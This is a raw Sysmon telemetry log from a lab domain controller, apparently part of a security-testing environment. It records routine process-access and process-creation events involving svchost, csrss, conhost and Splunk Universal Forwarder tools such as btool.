13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.436{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.448{59A5CD1D-8EE5-6005-C700-00000000A301}3904C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.358{59A5CD1D-8EE5-6005-C600-00000000A301}45764648C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE5-6005-C500-00000000A301}38004672C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.120{59A5CD1D-8EE5-6005-C600-00000000A301}4576C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000003835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C500-00000000A301}3800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.108{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 